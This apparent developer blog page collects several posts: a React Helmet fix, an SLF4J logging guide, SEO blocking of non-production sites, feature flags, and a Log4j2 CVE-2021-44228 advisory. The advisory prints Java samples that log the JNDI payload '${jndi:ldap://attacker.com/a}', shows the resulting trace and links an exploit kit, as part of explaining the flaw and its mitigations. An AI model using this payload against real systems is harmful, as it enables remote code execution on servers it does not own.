Wednesday, May 18, 2022

Uncaught TypeError: Cannot read properties of undefined (reading 'add') - React Helmet

 I was getting the below error while using the react-helmet to dynamically change the head section - meta tags, title etc, also the pages were not loading.

scheduler.development.js:171 Uncaught TypeError: Cannot read properties of undefined (reading 'add')

    at e.r.init (Dispatcher.js:53:1)

    at e.r.render (Dispatcher.js:67:1)

    at finishClassComponent (react-dom.development.js:17485:1)

    at updateClassComponent (react-dom.development.js:17435:1)

    at beginWork (react-dom.development.js:19073:1)

    at HTMLUnknownElement.callCallback (react-dom.development.js:3945:1)

    at Object.invokeGuardedCallbackDev (react-dom.development.js:3994:1)

    at invokeGuardedCallback (react-dom.development.js:4056:1)

    at beginWork$1 (react-dom.development.js:23964:1)

    at performUnitOfWork (react-dom.development.js:22776:1)

    at workLoopSync (react-dom.development.js:22707:1)

    at renderRootSync (react-dom.development.js:22670:1)

    at performSyncWorkOnRoot (react-dom.development.js:22293:1)

    at react-dom.development.js:11327:1

    at unstable_runWithPriority (scheduler.development.js:468:1)

    at runWithPriority$1 (react-dom.development.js:11276:1)

    at flushSyncCallbackQueueImpl (react-dom.development.js:11322:1)

    at workLoop (scheduler.development.js:417:1)

    at flushWork (scheduler.development.js:390:1)

    at MessagePort.performWorkUntilDeadline (scheduler.development.js:157:1)


To fix the issue

Replaced react-helmet with  react-helmet-async

npm install react-helmet-async or yarn add react-helmet-async

Wrap the App element with HelmetProvider

import { HelmetProvider } from 'react-helmet-async';

ReactDOM.render(

  <React.StrictMode>

  <HelmetProvider>

    <App />

 </HelmetProvider>

  </React.StrictMode>,

  document.getElementById('root')

);

Now the helmet can be used in individual components to change the dynamic header elements

import { Helmet } from 'react-helmet';

import {  Test   } from './components';

const Test = () => {

  return (

<React.Fragment>

<Helmet>

<title>Test</title>

<meta name="description" content="Test Description" />

<meta property="og:title" content="Test"/>

<meta property="og:description" content="Test" />

  </Helmet>

  <Introduction />

  <Details />

  <BackToTop />

</React.Fragment>

  );

};

export default Test;

After this, I saw the behavior, non of the existing meta tags defined in index.html apart from the title, replaced with the new values. To fix that, I added data-rh="true" to the metatags in index.html that require the change.

<meta property="og:title" content="default value" data-rh="true" />

Somehow data-react-helmet=" true"  property was not working.

Happy Coding!!!


Sunday, December 12, 2021

Apache Log4j2 Security Vulnerabilities(CVE-2021-44228) - Details | Apache Log4j2 Remote Code Execution through JNDI endpoins

A recently(09-Dec-2021) discovered a vulnerability in Log4j 2 is reportedly being exploited in the wild, putting widely used applications and cloud services at risk. Log4j2 is an open-source Java logging framework managed by Apache Software Foundation.

CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker-controlled LDAP and other JNDI-related endpoints.

The vulnerability CVE-2021-44228 allows remote code execution against LDAP and other JNDI-related endpoints - ${jndi:protocol://server}, e.g. ${jndi:ldap://attacker.com/a}. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.



While logging a message with the JNDI endpoint, the JNDI feature of the Log4j2 module tries to establish the connection to the JNDI URL specified in the log message, through this the attacker can make the system connect to the remote system and inject malicious code for execution(if the request/header from the end-user is directly logged through log4j2 logger).

Refer to https://logging.apache.org/log4j/2.x/security.html for more details on the issue.

All versions from all from 2.0-beta9 to 2.14.1 are impacted.

The issue is now addressed in version 2.15.0 - the JNDI feature is disabled by default, upgrade the dependency version to 2.15.0 for addressing the issue in your project. Also, Apache documented quick steps to mitigate the issue immediately without updating the dependency version on the above URL.

The project using any of the two approaches will be impacted -  If the below versions are enabled then the below code displays JNDI lookup exception

Option1: SLF4J Bridge for Log4j2

<dependency>

<groupId>org.apache.logging.log4j</groupId>

<artifactId>log4j-slf4j-impl</artifactId>

<version>2.14.1</version>

</dependency> 

Option2: Log4j2 direct dependencies

 <dependency>

    <groupId>org.apache.logging.log4j</groupId>

    <artifactId>log4j-api</artifactId>

    <version>2.14.1</version>

</dependency>

<dependency>

    <groupId>org.apache.logging.log4j</groupId>

    <artifactId>log4j-core</artifactId>

    <version>2.14.1</version>

</dependency> 

Sample CodeLog4j2 direct dependencies

import org.apache.logging.log4j.LogManager;

import org.apache.logging.log4j.Logger;

public class Sample{

private static final Logger log = LogManager.getLogger(Sample.class);

public static void main(String[] args) {  

String header ="${jndi:ldap://attacker.com/a}";  

log.info("test");  

log.info("test: "+log.getClass()+header);

}

}

Sample Code - SLF4J Wrapper

import org.slf4j.Logger;

import org.slf4j.LoggerFactory;

public class Sample{

private static final Logger log = LoggerFactory.getLogger(Sample.class);

public static void main(String[] args) {  

String header ="${jndi:ldap://attacker.com/a}";  

log.info("test");  

log.info(header);

}

}

Error Message: The below error message will be displayed while logging a message with JNDI endpoint, the JNDI feature trying to establish the connection to the JNDI URL specified in the log message, through this the attacker can make the system to connect to the remote system and inject malicious code for execution(if the request/header from the end user is directly logged through log4j logger).The LDAP systems enables the support to store the java class files, the attacker can store a malicious java file into his LDAP system and send the URL through request parameters or headers that will be logged directly through log4j2 impacted versions will give the system control to the attacker.(the attacker can use proxy LDAP server to send remote class with malicious code, refer to https://github.com/pimps/JNDI-Exploit-Kit for more details)



[INFO ] 2021-12-12 00:38:36.158 [main] Sample - test

2021-12-12 00:38:38,267 main WARN Error looking up JNDI resource [ldap://attacker.com/a]. javax.naming.CommunicationException: attacker.com:389 [Root exception is java.net.ConnectException: Connection refused: connect]

at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:244)

at java.naming/com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)

at java.naming/com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1616)

at java.naming/com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2847)

at java.naming/com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:348)

at java.naming/com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)

at java.naming/com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)

at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:204)

at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)

at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)

at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)

at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)

at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:223)

at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1116)

at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1038)

at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)

at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:467)

at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)

at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)

at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:345)

at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:244)

at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:229)

at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59)

at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)

at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)

at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)

at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)

at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)

at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)

at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)

at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:543)

at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:502)

at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:485)

at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:460)

at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82)

at org.apache.logging.log4j.core.Logger.log(Logger.java:161)

at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2198)

at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2152)

at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2135)

at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2011)

at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1983)

at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1320)

at com.core.oauth.provider.azureadb2c.Sample.main(Sample.java:17)

Caused by: java.net.ConnectException: Connection refused: connect

at java.base/java.net.PlainSocketImpl.connect0(Native Method)

at java.base/java.net.PlainSocketImpl.socketConnect(PlainSocketImpl.java:101)

at java.base/java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:399)

at java.base/java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:242)

at java.base/java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:224)

at java.base/java.net.SocksSocketImpl.connect(SocksSocketImpl.java:403)

at java.base/java.net.Socket.connect(Socket.java:608)

at java.base/java.net.Socket.connect(Socket.java:557)

at java.base/java.net.Socket.<init>(Socket.java:453)

at java.base/java.net.Socket.<init>(Socket.java:230)

at java.naming/com.sun.jndi.ldap.Connection.createSocket(Connection.java:337)

at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:223)

... 42 more

In the real scenario, remote class from the attacker server will be executed that will provide system control to the attacker.

The issue can be addressed in multiple ways but the best-recommended approach is by changing the dependency version to the latest 2.15.0

  • WAF (Web Application Filter)— Block the malicious request by enabling required rules
  • Disable Log4j2 and use different logger implementation — this should be easy if the SLF4J library is used, refer to https://www.albinsblog.com/2021/12/how-to-identify-which-logging-library-slf4j-using-for-logging.html for more details
  • Disable JNDI Lookups — add -Dlog4j2.formatMsgNoLookups=true to JVM parameter
  • (java -Dlog4j2.formatMsgNoLookups=true …) or Set Environment Variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true
  • , refer to https://logging.apache.org/log4j/2.x/security.html for more details
  • Remove the JndiLookup class from the class path — refer to https://logging.apache.org/log4j/2.x/security.html for more details
  • In JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1, com.sun.jndi.ldap.object.trustURLCodebase is set to false, meaning JNDI cannot load a remote codebase using LDAP, this will block the LDAP remote code execution vector. Ensure com.sun.jndi.ldap.object.trustURLCodebase java system property is not set to true.
  • Java Serialization Filtering — Whitelist only the known classes for deserialization, refer to https://medium.com/tech-learnings/serialization-filtering-deserialization-vulnerability-protection-in-java-349c37f6f416 for more details

In long run, we should validate/sanitize the user inputs(request parameters/headers, etc.) before performing any activities e.g. logging on the user inputs, this will help us to prevent malicious code injection.

Update Log4j2 to latest library version(2.15.0)

Option1: SLF4J Bridge for Log4j2

<dependency>

<groupId>org.apache.logging.log4j</groupId>

<artifactId>log4j-slf4j-impl</artifactId>

<version>2.15.0</version>

</dependency> 

Option2: Log4j2 direct dependencies

 <dependency>

    <groupId>org.apache.logging.log4j</groupId>

    <artifactId>log4j-api</artifactId>

    <version>2.15.1</version>

</dependency>

<dependency>

    <groupId>org.apache.logging.log4j</groupId>

    <artifactId>log4j-core</artifactId>

    <version>2.15.1</version>

</dependency>

The actual message is displayed after upgrading the dependency versions - no JNDI lookup performed on the JND endpoint

[INFO ] 2021-12-12 01:07:09.227 [main] Sample - test

[INFO ] 2021-12-12 01:07:09.230 [main] Sample - ${jndi:ldap://attacker.com/a}

The impact of the issue is based on how the project manages the log messages for the request parameters/headers received from the end-users - the impact is less if the message is filtered in any of the layers.

[Update 1]: 

The New log4j2 version is released(2.16.0) now, the fix applied on 2.15.0 was not complete to address all the issue scenarios, upgrade to the latest version(2.16.0) to address the issue completely. Refer https://logging.apache.org/log4j/2.x/security.html for more details(CVE-2021–45046)

[Update 2]:

The New log4j2 version is released(2.17.0) now, the fix applied on 2.16.0 was not complete and open for DOS(Denial of Service) attack. Refer https://logging.apache.org/log4j/2.x/security.html for more details(CVE-2021–45105]:

Impact on Adobe Experience Manager(AEM)

 Based on the analysis AEM OOTB includes log4j v1.2.17 and as CVE-2021-44228 impacting Apache Log4j 2( versions 2.0 to 2.14.1) looks to be no immediate impact, this is my personal view but need to wait for the confirmation from Adobe(please check with Adobe for any impact on AEM with this issue). But you should address if any of your custom projects on AEM embed the impacted maven dependency versions.

[Update]

Based on the further update from Adobe, the AEM core product is not impacted by the log4j2 JNDI lookup security issue but the custom code should be reviewed to ensure the impacted log4j2 version is not embedded.



Saturday, December 11, 2021

SLF4J - Simple Logging Facade for Java | How to identify which logging library SLF4J using for logging?

The Simple Logging Façade for Java (SLF4J) serves as a simple façade or abstraction for various logging frameworks, such as java.util.logging, logback and log4j. SLF4J allows the end-user to plug in the desired logging framework at deployment time. It enables a generic API making the logging independent of the actual implementation.



SimpleLogger(org.slf4j.simple.SimpleLoggerFactory) - sends all log messages to the console using the “standard” error output stream (System.err).

NOPLogger(org.slf4j.helpers.NOPLoggerFactory) - All logging will be silently discarded. Starting with version 1.6.0, if no binding(logger implementation) is found on the classpath, this one will be used by default. 

SLF4J: No SLF4J providers were found.
SLF4J: Defaulting to no-operation (NOP) logger implementation
SLF4J: See http://www.slf4j.org/codes.html#noProviders for further details.

Log4j(org.slf4j.log4j12.Log4jLoggerFactory/org.apache.logging.slf4j.Log4jLogger) - A wrapper over the Log4j 1.2.2 Logger's

Java Util Logging(org.slf4j.jul.JDK14LoggerFactory) - wrapper for the Java Util Logging logger

Logback Logging Framework(ch.qos.logback.classic.LoggerContext) - Wrapper for Logback Logging Framework

Dependencies:


SLF4J API Dependency:


<dependency>
    <groupId>org.slf4j</groupId>
    <artifactId>slf4j-api</artifactId>
    <version>2.0.0-alpha5</version>
</dependency>

Implementation Dependencies:


SimpleLogger:

<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-simple</artifactId>
<version>2.0.0-alpha5</version>
<scope>runtime</scope>
</dependency>

The logger configuration can be enabled by adding "simplelogger.properties" file to the class path(src/main/resources)

simplelogger.properties

org.slf4j.simpleLogger.logFile=System.out
org.slf4j.simpleLogger.defaultLogLevel=warn

Log4j 1.2:

<dependency>
    <groupId>org.slf4j</groupId>
    <artifactId>slf4j-log4j12</artifactId>
    <version>2.0.0-alpha5</version>
    <scope>runtime</scope>
</dependency>

While enabling Log4j logging Framework, the log4j.proerties should be added into the classpath(src/main/resources), sample log4j file

log4j.properties

log4j.rootLogger=info, stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
log4j.appender.stdout.layout.ConversionPattern=%-4r [%t] %-5p %c %x - %m%n

Log4j 2:

<!-- SLF4J Bridge -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-slf4j-impl</artifactId>
<version>2.15.0</version>
</dependency>

In this case remove SLF4J API dependency(slf4j-api) - only add the above dependency 

While enabling Log4j 2 logging Framework, the log4j2.xml should be added into the classpath(src/main/resources), sample log4j2.xml file

log4j2.xml

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="INFO">
    <Appenders>
        <Console name="console" target="SYSTEM_OUT">
            <PatternLayout
                pattern="[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg%n" />
        </Console>
    </Appenders>
    <Loggers>
        <Root level="debug" additivity="false">
            <AppenderRef ref="console" />
        </Root>
    </Loggers>
</Configuration>


Java Util Logging:

<dependency>
    <groupId>org.slf4j</groupId>
    <artifactId>slf4j-jdk14</artifactId>
    <version>2.0.0-alpha5</version>
    <scope>runtime</scope>
</dependency>

The default logger configuration is available in $JAVA_HOME/conf/logging.properties, custom logging.properties can be enabled if required(there are multiple ways to load the custom logging.properties - JVM parameter - -Djava.util.logging.config.file=logging.properties, System.setProperty("java.util.logging.config.file", "logging.properties"); etc)

logging.properties

handlers= java.util.logging.ConsoleHandler
.level= INFO
java.util.logging.ConsoleHandler.level = INFO
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter

com.demo.logging.level=INFO

Logback Logging Framework

<dependency>
    <groupId>ch.qos.logback</groupId>
    <artifactId>logback-classic</artifactId>
    <version>1.3.0-alpha10</version>
</dependency>

The logger configuration can be enabled by adding "logback.xml" file to the class path(src/main/resources)

<configuration>
<appender name="CONSOLE"
class="ch.qos.logback.core.ConsoleAppender">
<layout class="ch.qos.logback.classic.PatternLayout">
<Pattern>
%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n
</Pattern>
</layout>
</appender>

<logger name="com.demo" level="debug" additivity="false">
<appender-ref ref="CONSOLE" />
</logger>

<root level="error">
<appender-ref ref="CONSOLE" />
</root>
</configuration>

Ensure only one implementation is enabled to the project, the latest SLF4J versions use the first implementation loaded as the actual implementation.

SLF4J: Class path contains multiple SLF4J providers.
SLF4J: Found provider [ch.qos.logback.classic.spi.LogbackServiceProvider@34b7bfc0]
SLF4J: Found provider [org.slf4j.jul.JULServiceProvider@366e2eef]
SLF4J: Found provider [org.slf4j.simple.SimpleServiceProvider@6df97b55]
SLF4J: Found provider [org.slf4j.log4j12.Log4j12ServiceProvider@3cbbc1e0]
SLF4J: See http://www.slf4j.org/codes.html#multiple_bindings for an explanation.
SLF4J: Actual provider is of type [ch.qos.logback.classic.spi.LogbackServiceProvider@34b7bfc0]

Some of the time, we may have the use case to identify the logging implementation SLF4J is using to log the messages, this can be easily identified by looking into the logger implementation dependency added to the project. But sometimes the dependencies may come from external projects, the below APIs can be used to identify the same.

//
org.slf4j.Logger logger = org.slf4j.LoggerFactory.getLogger(Application.class);
System.out.println(logger.getClass());

Output - class org.slf4j.simple.SimpleLogger

//

LoggerFactory.getILoggerFactory().getClass().getName()

Output - ch.qos.logback.classic.LoggerContext

//

In earlier versions, even the below API is supported

org.slf4j.impl.StaticLoggerBinder.getSingleton().getLoggerFactory()

Output - ch.qos.logback.classic.LoggerContext[default]

Sample Java Class:

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class Sample {

private static final Logger log = LoggerFactory.getLogger(VulnerableLog4jExampleHandlerLocal.class);

public static void main(String[] args) {
 
      log.info("test");  
log.info(log.getClass().toString());
log.info(LoggerFactory.getILoggerFactory().getClass().getName());
}
}


Tuesday, January 12, 2021

Different Approaches to Block Non-Prod URL’s from search indexing

One of the major SEO concerns while working on the website is blocking the non-production URLs appearing from search engines result(index), the search engines can index the non-prod URL if those URL’s are by mistake linked from live URL’s or exposed through any other external links. The indexing of non-prod URL can cause duplicate content issues that also impact the ranking of live URL’s, the end-user may access the non-production URL instead of the Live URL. This can sometimes lead to a compliance issue if the content bound to compliance and non-live content is exposed to the end-user.

In this tutorial let us discuss the details on how to block the non-prod URLs appearing from search engines.

You can search for site:<domainname> e.g site:www.albinsblog.com to identify whether the specific domain is indexed by the search engine, also you can use some of the third party SEO tools to identify the URL’s indexed in search engines.

Image for post

Let us now see some of the options to block search engines from indexing non-production URL.

HTTP Basic Authentication:

Server-side HTTP Basic Authentication for domains block the search engines from crawling and indexing the domain content. Enable HTTP basic authentication in the web server for the non-prod domains so that the non-prod domains will be blocked for search engines but the live content will be indexed as expected.

Basic Authentication for Apache 2.4 Virtualhost

<Location />
AuthType Basic
AuthBasicProvider file
AuthUserFile /etc/httpd/conf.d/.htpasswd
#create the user through htpasswd, htpasswd -c /etc/httpd/conf.d/.htpasswd testuser
AuthName "Authentication Required"
Require valid-user
</Location>

If the same configuration is shared for different environments, enable the authentication based on the condition(e.g based on an ENV_TYPE environment variable or based on the incoming domain value)

<Location />  <If "'${ENV_TYPE}' =~ m#(dev|uat|stage)#">  
AuthType Basic
AuthBasicProvider file
AuthUserFile /etc/httpd/conf.d/.htpasswd
AuthName "Authentication Required"
Require valid-user
</If>
<Else>
Require all granted
</Else>
</Location>

The basic authentication will create challenge while performance testing the websites in stage or other environments(part of a pipeline or outside ) mainly on the caching behavior — the basic authentications enabled websites are skipped from caching, the workaround is disabling the basic authentication whenever the performance testing is executed in the environment(or execute the testing with basic authentication but the test result will not reflect the live behavior).

IP Restriction:

IP restriction helps you to allow only the known IPs to access the non-production URLs, whitelist the known IP ranges so that the external search engines will not have access to crawl/index the non-production websites but the intended users will be able to access the non-prod websites for testing.

The IP restriction can be enabled in load balancer or web server, the webserver will give more control and flexibility to modify the restrictions whenever required by the development team.

IP restriction configuration for Apache 2.4 Virtualhost

<Location />
<RequireAny>
Require ip xxx.xx.0.0/24
Require ip xxx.xx.0.0/24
</RequireAny>
</Location>

If the same configuration is shared for different environments, enable the IP restriction based on the condition(e.g based on an ENV_TYPE environment variable or based on the incoming domain value)

<Location />
<If "'${ENV_TYPE}' =~ m#(dev|uat|stage)#">
<RequireAny>
Require ip xxx.xx.0.0/24
Require ip xxx.18.0.0/24
</RequireAny>
</If>
</Location>

The main challenge of IP whitelisting is enabling the Whitelist rules while working with distributed teams and the dynamic IP’s involved to access the servers.

Robots Meta Tag:

The robots metatag in the page source can help to keep the non-production URL’s out of the search engine index, enable the required robots meta tag in the page source, you need to apply the required custom logic to enable the meta tag only for non-prod environments.

<meta name="robots" content="noindex, nofollow, noarchive, nosnippet, nocache" />

noindex — Do not show this page in search results.

nofollow — Do not follow the links on this page.

noarchive — Do not show a cached link in search results.

nosnippet — Do not show a text snippet or video preview in the search results for this page

nocache — Same as noarchive, but only used by MSN/Live.

The challenge with this approach is the robots metatag can be applied only for HTML resources, not for different assets — pdf, png, jpg and etc also compare to the above two approaches the search engines should crawl all the individual pages to identify the pages are not enabled for indexing.

Robots Meta Tag HTTP header:

The X-Robots-Tag in the HTTP response header can help to keep the non-production URL’s out of the search engine index, the response header can be enabled for both HTML documents and other assets. Better to add this header to the response of all non-prod resources through webserver e.g Apache.

Configuration for Apache Virtualhost

Header set X-Robots-Tag “noindex, nofollow, noarchive, nosnippet, nocache”

If the same configuration is shared for different environments, enable the header based on the condition(e.g based on an ENV_TYPE environment variable or based on the incoming domain value)

<Location />
<If "'${ENV_TYPE}' =~ m#(dev|uat|stage)#">
Header set X-Robots-Tag "noindex, nofollow, noarchive, nosnippet, nocache"
</if>
</Location>

This approach is very easy to manage compared to enabling the metatag in the page source, the search engines should crawl all the individual pages to identify the pages that are not enabled for indexing.

Robots TXT:

Robots.txt file gives the instruction to search engines not to crawl the websites through Disallow tags but this will not ensure the pages are excluded from the index. The pages blocked by robots.txt can still appear in the index if the page is linked from external sources.

Enable a simple robots.txt in the root of every non-prod websites to block the search engines crawling the non-production URL’s(ensure the same Disallow rules are not enabled for live sites by mistake otherwise it will impact the live site indexing)

User-agent: *
Disallow: /

This approach can be used along with Robots metatag or HTTP header to block the search engines crawling the website content after removing them from the index — if the page is already in the index that should be removed first from the index before blocking the crawling through robots.txt otherwise search engine will not able to crawl and see the metatag or header enabled to the pages.

URL Removal:

The Search engine URL Removal tool can be used to remove the already indexed URL from the search engine(also from cache) if something indexed that shouldn't be indexing e.g non-prod URL.

The Removals tool enables you to temporarily block pages from Google Search results on sites that you own. When a page’s URL is requested for removal, the request is temporary and persists for at least 90 days, meanwhile, anyone of the approach discussed above should be enabled to block the search engines completely from crawling and re-indexing the pages again.

Either specific URL, specific section, or the complete site can be removed from the indexing(the site property should be owner can only perform this activity), for google, this can be performed through google search console

Image for post

The authentication and IP restriction will be the most promising approach to keep non-production URLs safer from search engines, in case these two approaches do not work for your case try enabling Robots Meta Tag HTTP header (use robots metatag if required) from webserver for non-prod domains along with robots.txt blocking the crawling.



Tuesday, July 28, 2020

Trunk Based Development and Feature Flags for Continuous Delivery

Trunk Based Development is a branching model in which developers create short-lived feature branches and merge back into the “trunk” branch, often called as the master branch.

The guiding principals of Trunk Based Development

  • There is one “trunk” branch where developers merge their changes.
  • Developers should merge small changes as often as they can.
  • Merges must be reviewed, tested, and must not destroy the “trunk”.
  • All code in “trunk” must be release ready at all times.
  • Feature branches must be short-lived.
  • Keep your commit messages as concise as possible

Comparing Trunk Based Development to GitFlow

trunk-based-development

The Trunk Based Branching Model

The below model can be used for scaled teams, the development is done with short-lived feature branches, the changes are often merged to the “trunk”. For small teams, the developers can directly merge the changes to the “trunk” in small chunks.

trunk-based-development

Changes made in the release branches — snapshots of the code when it’s ready to be released — are usually merged back to trunk as soon as possible. One key benefit of the trunk-based approach is that it reduces the complexity of merging events and keeps code current by having fewer development lines and by doing small and frequent merges.

The developers should experienced enough to make this model successful, this model often creates conflicts if the changes are not reviewed and tested rigorously. Use this model if you are looking to push out a new product fast and want to iterate quickly.

Feature Development with Feature Flags

Trunk Based Development uses Feature Flags as a mechanism to manage new feature releases. A feature flag is simply a boolean condition that modifies the behavior of a component, module, or function in your application.

Following a Feature Flag pattern trades the simplicity of isolated branch workflows, such as GitFlow, in favor of flexible feature rollouts, continuous delivery, and application personalization.

Setting Up Feature Flags

A simple way to begin using feature flags is to maintain a single file containing your feature flags. Let us see how to manage the flags in Typescript with React application through a simple approach. The feature flags can also be managed through external tools like optimizel or launchdarkly

featureFlags.tsconst featureFlags = {
hellowordnewfeature: false
}
export function getFeatureFlag(key){
return featureFlags[key] || false;
}
helloword.ts
//return feature based on the feature flag
import { getFeatureFlag } from "./featureFlags";
const createHelloWord = () => {
if(getFeatureFlag("hellowordnewfeature")){
return createNewHelloWord()
}
return createOldHelloWorld()
}

Here the new feature is returned based on the flag “hellowordnewfeature”, if the flag is “true” then the new feature(createNewHelloWord) is returned else the old feature(createOldHelloWorld).

This TypeScript module(featureFlags.ts) can be extended to fetch the features from external or internal services.

Existing Feature Development with Feature Flags

Existing feature development with feature flags is slightly more complex but offers more flexibility for continuous delivery and personalization.

Small Incremental Change

If the proposed feature is a small incremental change, we can modify an existing code path to augment behavior. Take for example adding a new calculation for the total.

featureFlags.tsconst featureFlags = {
hellowordnewfeature: false,
useNewcalculateTotal:true
}
export function getFeatureFlag(key){
return featureFlags[key] || false;
}
// before
const calculateTotal = (qty, val) => {
return qty * val
}
// after
const calculateTotal= (qty, val, tax) => {
if(getFeatureFlag("useNewcalculateTotal")){
return qty * val * tax
}
return qty *val
}

Large Modification

If the proposed feature is large, for example, we want to display a completely new TaxCalculator component, we would need to define a new code path and entry-point for that component.

featureFlags.tsconst featureFlags = {
hellowordnewfeature: false,
useNewcalculateTotal:true,
useNewTaxCalculation:true
}
export function getFeatureFlag(key){
return featureFlags[key] || false;
}
TaxCalculator.tsximport { getFeatureFlag } from "./featureFlags";
import { TaxCalculatorOld, TaxCalculatorNew } from "./components";
const TaxCalculator = props => {
if(getFeatureFlag("useNewTaxCalculation"){
return <TaxCalculatorNew />
}
return <TaxCalculatorOld />
}

New Feature Development with Feature Flags

New feature development with feature flags is simpler than existing features. Since there are no existing code paths for your code to execute, this code path will be disabled by default while this feature is WIP.

The new feature development process with flags should look like this;

  • create a feature flag for your new feature
  • begin working on your code
  • ensure your flag is false before merging into master
  • merge your code frequently
  • when the feature is ready for release, remove the flag

Conclusion

Trunk based Development and Feature Flags together can be used for continuous delivery, delivering the features faster to market. Planning them carefully will allow you to quickly deliver the new business features to the system. The feature flags can also be managed through external tools like optimizel or launchdarkly, tools provide SDK to manage the features external to the applications.

References

https://cloud.google.com/solutions/devops/devops-tech-trunk-based-development

https://featureflags.io/